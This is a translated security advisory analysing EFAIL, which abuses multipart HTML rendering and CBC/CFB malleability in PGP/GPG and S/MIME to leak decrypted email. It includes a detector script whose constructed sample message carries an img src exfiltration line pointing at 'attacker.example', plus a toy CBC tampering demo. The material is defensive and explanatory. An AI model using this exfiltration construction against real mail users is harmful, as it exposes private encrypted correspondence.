2025-03-31 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/01 Report
How can the PGP/GPG and S/MIME vulnerabilities in EFAIL be analyzed? This article addresses that question with a detailed analysis and the corresponding countermeasures, in the hope of giving readers who face the problem a simple and practical approach.
0x00 vulnerability background
PGP/GPG and S/MIME are two important standards that provide end-to-end security for e-mail.
On the 14th, the European security researcher Sebastian Schinzel posted a vulnerability warning about PGP/GPG and S/MIME on Twitter, and the details were then made public.
360-CERT has followed the vulnerability and analyzed it in detail.
0x01 vulnerability details
Email clients can display mail content in many ways, of which HTML rendering is the most popular. HTML can request network resources, for example through tags such as img.
The EFAIL attack abuses the src attribute of the img tag: the decrypted text is sent to a remote server controlled by the attacker, resulting in information disclosure.
The root cause is that when handling a multipart message, the e-mail client processes each part independently but then renders all the parts into the same HTML document. As a result, when the email is displayed, the attacker's plaintext and the decrypted original text end up together, and that is where the security risk lies.
0x02 penetration attack
An email may contain multiple parts, as shown in the figure:
A multipart Content-Type identifies the message as multi-part, the protocol parameter describes the parts, and the boundary parameter separates them.
When the mail client processes the message, it handles each part independently but finally renders them all into the same HTML view. The following PoC takes advantage of this behaviour:
As you can see, the PoC uses the boundary to divide the mail into three parts: Content-Type: text/html, Content-Type: multipart/encrypted; protocol="application/pgp-encrypted", and Content-Type: text/html.
The first part opens an img tag whose src points to a remote host controlled by the attacker, which receives the plaintext message. Note that the quotation mark of src and the /> of the img tag are not closed here.
The second part is the end-to-end encrypted e-mail body.
The third part closes the tag opened in the first part.
Because the mail client handles each part independently, the encrypted part is decrypted during processing. When the victim opens the message, it is decrypted and rendered, and the message finally resolves to:
When such content is displayed by the victim's e-mail client, an HTTP request is issued that sends the decrypted original message to the attacker's host.
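As an added example (not code from the article or from the EFAIL researchers), a small Python checker that a mail gateway or client could run to flag the three-part layout described above: a plaintext HTML part with a dangling img src= immediately followed by a multipart/encrypted part. The sample message, the attacker.example host and the fake ciphertext are constructed placeholders.

```python
import re
from email import message_from_string

# Constructed sample in the three-part layout described above; the host
# name is a placeholder, not a real indicator, and the ciphertext is fake.
SAMPLE = """\
From: alice@example.org
To: bob@example.org
Subject: constructed sample
Content-Type: multipart/mixed; boundary="OUTER"

--OUTER
Content-Type: text/html

<img src="http://attacker.example/
--OUTER
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="ENC"

--ENC
Content-Type: application/octet-stream

placeholder-ciphertext
--ENC--
--OUTER
Content-Type: text/html

">
--OUTER--
"""

# An <img ...> whose src attribute value is opened but never closed in this part.
UNCLOSED_SRC = re.compile(r'<img[^>]*\bsrc\s*=\s*"[^"]*$', re.IGNORECASE)

def efail_direct_exfil_findings(raw):
    """Flag a plaintext HTML part with a dangling src= right before an encrypted part."""
    msg = message_from_string(raw)
    parts = msg.get_payload() if msg.is_multipart() else [msg]
    findings = []
    for i in range(len(parts) - 1):
        part, nxt = parts[i], parts[i + 1]
        if part.get_content_type() != "text/html" or nxt.get_content_type() != "multipart/encrypted":
            continue
        body = part.get_payload(decode=True).decode("utf-8", "replace").strip()
        if UNCLOSED_SRC.search(body):
            findings.append((i, "unclosed img src attribute before multipart/encrypted part"))
    return findings
```

A client that renders each encrypted part in its own isolated document, with remote content blocked, is not affected by this layout regardless of what the checker reports.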
0x03 S/MIME defect
If S/MIME uses CBC or CFB mode, it can be attacked by EFAIL.
Take CBC as an example: CBC mode splits the plaintext into blocks, and each block is XORed with the previous ciphertext block (the IV for the first block) before it is encrypted, as shown in the following figure:
In (a), the IV, C0 and P0 are known data; the goal of the whole attack is to obtain the plaintext behind C2 and C3, that is, the unknown target data.
The attack logic is simple: the ciphertext block corresponding to the known header (the plaintext "Content-type" paragraph) is tampered with so that it decrypts to an img tag that wraps the encrypted ciphertext. When the result is parsed and displayed, the same attack effect as the first method is achieved.
CFB mode is similar to CBC: part of the plaintext of the encrypted content must be known, and the img tag is inserted by replacing blocks step by step to achieve the attack.
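The CBC property the attack relies on, and the integrity check that stops it, as an added example that is not code from the article: a known IV and P0 let anyone rewrite P0 without the key, because P_i = D(C_i) XOR C_{i-1}. The block cipher here is a toy SHA-256 Feistel permutation and the encrypt-then-MAC tag stands in for a real integrity mechanism; both are assumptions made to keep the example self-contained, and the key and plaintext are constructed.

```python
import hashlib
import hmac

BLOCK = 8  # toy block size in bytes

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(block, key, decrypt=False):
    """Toy 64-bit Feistel permutation over SHA-256; stand-in for a real block cipher."""
    L, R = block[:4], block[4:]
    for r in (range(3, -1, -1) if decrypt else range(4)):
        L, R = R, xor(L, hashlib.sha256(key + bytes([r]) + R).digest()[:4])
    return R + L  # swap back so the same loop with reversed rounds inverts it

def cbc_encrypt(key, iv, plaintext):  # C_i = E(P_i XOR C_{i-1}), C_{-1} = IV
    prev, out = iv, b""
    for i in range(0, len(plaintext), BLOCK):
        prev = feistel(xor(plaintext[i:i + BLOCK], prev), key)
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):  # P_i = D(C_i) XOR C_{i-1}
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += xor(feistel(block, key, decrypt=True), prev)
        prev = block
    return out

def tag(mac_key, iv, ciphertext):
    return hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()

def decrypt_checked(enc_key, mac_key, iv, ciphertext, t):
    """Encrypt-then-MAC receiver: release no plaintext unless the tag verifies."""
    if not hmac.compare_digest(tag(mac_key, iv, ciphertext), t):
        return None
    return cbc_decrypt(enc_key, iv, ciphertext)

def demo():
    ek, mk, iv = b"enc-key", b"mac-key", bytes(range(BLOCK))
    pt = b"Content-type: text; Secret body!"  # 32 bytes, constructed sample
    ct = cbc_encrypt(ek, iv, pt)
    t = tag(mk, iv, ct)
    # IV and P0 are known (as in figure (a) above); XORing one IV byte with
    # "C" ^ "X" rewrites the first plaintext byte to "X" without the key.
    bad_iv = bytes([iv[0] ^ ord("C") ^ ord("X")]) + iv[1:]
    unchecked = cbc_decrypt(ek, bad_iv, ct)           # plaintext silently altered
    checked = decrypt_checked(ek, mk, bad_iv, ct, t)  # None: tampering detected
    return unchecked, checked, decrypt_checked(ek, mk, iv, ct, t)
```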
0x04 vulnerability demonstration
The vulnerability has many attack scenarios, such as a man-in-the-middle attack.
The attacker, acting as a man in the middle, hijacks the mail traffic and adds multipart sections before and after the encrypted mail. After the user opens the email, the plaintext content is sent to the attacker through the img tag, leaking the encrypted email:
0x05 vulnerability impact surface
The vulnerability affects multiple applications on multiple platforms, including Windows, Linux, Android, iOS and so on. The specific scope of impact is shown below:
0x06 security recommendations
Although the vulnerability has a wide impact, it is difficult to exploit.
There is currently no fix for this vulnerability, so until one is available, please immediately disable or uninstall tools that automatically decrypt PGP-encrypted email, and do not read PGP-encrypted messages.
This concludes the analysis of the PGP/GPG and S/MIME vulnerabilities in EFAIL. I hope the above content is of some help; if you still have questions, you can follow the industry information channel for more related knowledge.